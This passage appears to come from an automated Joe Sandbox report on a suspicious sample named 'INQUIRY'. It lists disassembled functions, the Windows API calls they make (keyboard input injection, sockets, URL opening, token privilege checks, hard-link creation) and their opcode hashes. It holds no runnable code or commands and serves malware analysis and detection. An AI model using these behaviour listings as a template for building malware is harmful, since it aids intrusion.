                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A676EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A67702
• CLSIDFromProgID.OLE32(?,?,00000000,00A9FB80,000000FF,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A67727
• _memcmp.LIBCMT ref: 00A67748
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• GetWindowRect.USER32(010ED930,?), ref: 00A99863
• ScreenToClient.USER32(00000002,00000002), ref: 00A99896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A99903
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A69AD2
• __itow.LIBCMT ref: 00A69B03
  • Part of subcall function 00A69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00A69DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00A69B6C
• __itow.LIBCMT ref: 00A69BC3
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00A869D1
• WSAGetLastError.WSOCK32(00000000), ref: 00A869E1
  • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
  • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A86A45
• WSAGetLastError.WSOCK32(00000000), ref: 00A86A51
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A9F910), ref: 00A864A7
• _strlen.LIBCMT ref: 00A864D9
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A7B89E
• GetLastError.KERNEL32(?,00000000), ref: 00A7B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A7B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A7B915
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A988DE
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 00A9AB60
• GetWindowRect.USER32(?,?), ref: 00A9ABD6
• PtInRect.USER32(?,?,00A9C014), ref: 00A9ABE6
• MessageBeep.USER32(00000000), ref: 00A9AC57
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
                                                                                              • Opcode ID: e07cf67c531c889347d8a5e35242691f06d9df447ee4b2d2451e1fb3c487d3fe
                                                                                              • Instruction ID: e15b5831d34e6ed7e1f9af4c4a14a4b1b11315238680ea63bca39f3d176580a7
                                                                                              • Opcode Fuzzy Hash: e07cf67c531c889347d8a5e35242691f06d9df447ee4b2d2451e1fb3c487d3fe
                                                                                              • Instruction Fuzzy Hash: 5F415B30B006199FCF11DF98D884A697BF5FB69310F1880AAE816DF264D730E842DBD2
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A70B27
                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00A70B43
                                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00A70BA9
                                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00A70BFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 5fa4234be4b23b7e7cfc97fa8460b42a1ef608694260cae879b975fae6d6de14
                                                                                              • Instruction ID: 91971eb16b28959aa0037a8466ceddd10c10cadc3cb915e2622343b51e32063d
                                                                                              • Opcode Fuzzy Hash: 5fa4234be4b23b7e7cfc97fa8460b42a1ef608694260cae879b975fae6d6de14
                                                                                              • Instruction Fuzzy Hash: 9A314870A40218EEFF30CB65CC05FFABBB6ABC5319F04C25AE488921D1C3748A419751
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00A70C66
                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A70C82
                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A70CE1
                                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00A70D33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 409536e39c828d8833c3bb0ab8ecbb0ab0a2519e2097359c008b32bf357dd5b2
                                                                                              • Instruction ID: 7703ce927f65a3134c4f871b2765b10af14a011ffae34a064f41aaa2bc649d8b
                                                                                              • Opcode Fuzzy Hash: 409536e39c828d8833c3bb0ab8ecbb0ab0a2519e2097359c008b32bf357dd5b2
                                                                                              • Instruction Fuzzy Hash: 9E31E530A40318EEFF35CB698C05FFEBBBAAB45310F14C35AE489921D1C37599559791
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A461FB
                                                                                              • __isleadbyte_l.LIBCMT ref: 00A46229
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A46257
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A4628D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: d89cc2993d7f0b406cda77a5790b3a7864bb5afa1c210acd8581fe5029486e59
                                                                                              • Instruction ID: 08d8dfa4cec94e88460abcdc01afad9947f8b2eabb5d8b720fcc8db6472f3105
                                                                                              • Opcode Fuzzy Hash: d89cc2993d7f0b406cda77a5790b3a7864bb5afa1c210acd8581fe5029486e59
                                                                                              • Instruction Fuzzy Hash: 3831D035A04246BFDF218F69CC44BAA7BB9FF82310F154129F824971A1DBB0D950DB92
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00A94F02
                                                                                                • Part of subcall function 00A73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A7365B
                                                                                                • Part of subcall function 00A73641: GetCurrentThreadId.KERNEL32 ref: 00A73662
                                                                                                • Part of subcall function 00A73641: AttachThreadInput.USER32(00000000,?,00A75005), ref: 00A73669
                                                                                              • GetCaretPos.USER32(?), ref: 00A94F13
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00A94F4E
                                                                                              • GetForegroundWindow.USER32 ref: 00A94F54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 61dd444c9deca450103db792e00bad85f2783cb968ca4024d5288caa0c0f00cd
                                                                                              • Instruction ID: b84da4c51c5eac400c768802eb7b16a5fd8b7304ce2f17705829ffe6fd88c51e
                                                                                              • Opcode Fuzzy Hash: 61dd444c9deca450103db792e00bad85f2783cb968ca4024d5288caa0c0f00cd
                                                                                              • Instruction Fuzzy Hash: 66310B72E00108AFDB00EFA5C9959EFB7F9EF99300F10406AE415E7241EA75AE45CBA0
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • GetCursorPos.USER32(?), ref: 00A9C4D2
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A4B9AB,?,?,?,?,?), ref: 00A9C4E7
                                                                                              • GetCursorPos.USER32(?), ref: 00A9C534
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A4B9AB,?,?,?), ref: 00A9C56E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2864067406-0
                                                                                              • Opcode ID: 5fee8155ac1608bab45abc6a809fbbe270da9c10b47e79320dfe8e1f09beaba5
                                                                                              • Instruction ID: b10f465ffd712a8513c1ebefa7f9c045df0614b610abfcc85d8df97202cc6d6b
                                                                                              • Opcode Fuzzy Hash: 5fee8155ac1608bab45abc6a809fbbe270da9c10b47e79320dfe8e1f09beaba5
                                                                                              • Instruction Fuzzy Hash: 1731A235700458AFCF15CF98C858EEA7BF5EB49320F45406AF9058B261CB31AD51EBA4
                                                                                              APIs
                                                                                                • Part of subcall function 00A6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A68121
                                                                                                • Part of subcall function 00A6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A6812B
                                                                                                • Part of subcall function 00A6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A6813A
                                                                                                • Part of subcall function 00A6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68141
                                                                                                • Part of subcall function 00A6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68157
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A686A3
                                                                                              • _memcmp.LIBCMT ref: 00A686C6
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A686FC
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A68703
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1592001646-0
                                                                                              • Opcode ID: 2d6c53835c6c80cf1b4953cf8f0e5f0ababa5a0ea3f58af9390fe3b30776c771
                                                                                              • Instruction ID: fab187e302ca2137f01e0845658fa888cf00d08eb3463971b285690ccd8b543a
                                                                                              • Opcode Fuzzy Hash: 2d6c53835c6c80cf1b4953cf8f0e5f0ababa5a0ea3f58af9390fe3b30776c771
                                                                                              • Instruction Fuzzy Hash: 3321AF71E40109EFDB10DFA4CA49BEEB7B9EF44304F158259E854AB240EB75AE05CB90
                                                                                              APIs
                                                                                              • __setmode.LIBCMT ref: 00A309AE
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50
                                                                                              • _fprintf.LIBCMT ref: 00A309E5
                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 00A65DBB
                                                                                                • Part of subcall function 00A34AAA: _flsall.LIBCMT ref: 00A34AC3
                                                                                              • __setmode.LIBCMT ref: 00A30A1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                              • String ID:
                                                                                              • API String ID: 521402451-0
                                                                                              • Opcode ID: bcfe6cf60913cd146d7ffe4af53abd1074388a190298ab8704ccba8a21e2ec90
                                                                                              • Instruction ID: 547987faa929ab84ea18a4552c5bc6b9965f7c23e054f1587b788c19210f14b0
                                                                                              • Opcode Fuzzy Hash: bcfe6cf60913cd146d7ffe4af53abd1074388a190298ab8704ccba8a21e2ec90
                                                                                              • Instruction Fuzzy Hash: 27112431D04204BFDB08B7B4AD4B9FE77AC9F89360F244056F105A7182EF20698687A5
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A817A3
                                                                                                • Part of subcall function 00A8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8184C
                                                                                                • Part of subcall function 00A8182D: InternetCloseHandle.WININET(00000000), ref: 00A818E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1463438336-0
                                                                                              • Opcode ID: ed9840ebffcdf236d7d286ef599aea11c45517cf2905061f5e98537be5bfa7a5
                                                                                              • Instruction ID: 59dc9a53df7a7a624d0324e0bbe5f3b0041c8e1a8f2a258d8ee15e60bc5fd77c
                                                                                              • Opcode Fuzzy Hash: ed9840ebffcdf236d7d286ef599aea11c45517cf2905061f5e98537be5bfa7a5
                                                                                              • Instruction Fuzzy Hash: 1F219335200605BFEB12AFA0DC41FBABBADFF48711F10402EFA55D6650DB75D8229BA0
APIs
• GetFileAttributesW.KERNEL32(?,00A9FAC0), ref: 00A73A64
• GetLastError.KERNEL32 ref: 00A73A73
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00A73A82
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A9FAC0), ref: 00A73ADF
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 2731abb5a874c4167fcacca3c49d51656d6e127bc1e50cb1e458b09ef7a000ad
• Instruction ID: fa1080210a607fd43a63f0d2b0ac80fc7593eab683086345e7181b3dc0a24e21
• Opcode Fuzzy Hash: 2731abb5a874c4167fcacca3c49d51656d6e127bc1e50cb1e458b09ef7a000ad
• Instruction Fuzzy Hash: 822176755092019F8710DF24CD428AE77E8AE553A4F14CA19F49DC7291DB31DE46DB42
APIs
  • Part of subcall function 00A6F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?), ref: 00A6F0CB
  • Part of subcall function 00A6F0BC: lstrcpyW.KERNEL32(00000000,?,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6F0F1
  • Part of subcall function 00A6F0BC: lstrcmpiW.KERNEL32(00000000,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?), ref: 00A6F122
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DCEC
• lstrcpyW.KERNEL32(00000000,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DD12
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DD46
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 6a245c5939b80ccad500b6f31496779a20aaa50fbc2121ee62cf8cb49b936007
• Instruction ID: 1095ea73afd2cf2057c15915e8fa70a216c48a9d50f6bd9d156a666c0f0bf6b3
• Opcode Fuzzy Hash: 6a245c5939b80ccad500b6f31496779a20aaa50fbc2121ee62cf8cb49b936007
• Instruction Fuzzy Hash: D611BB3A200305EFCB25AF74D845D7A77B8FF46390B50812AF906CB2A0EB729851C7E0
APIs
• _free.LIBCMT ref: 00A45101
  • Part of subcall function 00A3571C: __FF_MSGBANNER.LIBCMT ref: 00A35733
  • Part of subcall function 00A3571C: __NMSG_WRITE.LIBCMT ref: 00A3573A
  • Part of subcall function 00A3571C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: dbb302f7233f125a06da9070d2e7ee6d45884e0727b1be2f12d5f9e714150162
• Instruction ID: 94bd49a237dcfdccf037e518afdb1d40b410335d5925986e79b0a592518869d6
• Opcode Fuzzy Hash: dbb302f7233f125a06da9070d2e7ee6d45884e0727b1be2f12d5f9e714150162
• Instruction Fuzzy Hash: 6F113676D00B06AFCF313FB8FD45B6E37989F843A0F20062AF9059A152DF3488418780
APIs
• _memset.LIBCMT ref: 00A144CF
  • Part of subcall function 00A1407C: _memset.LIBCMT ref: 00A140FC
  • Part of subcall function 00A1407C: _wcscpy.LIBCMT ref: 00A14150
  • Part of subcall function 00A1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A14160
• KillTimer.USER32(?,00000001,?,?), ref: 00A14524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A14533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A4D4B9
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
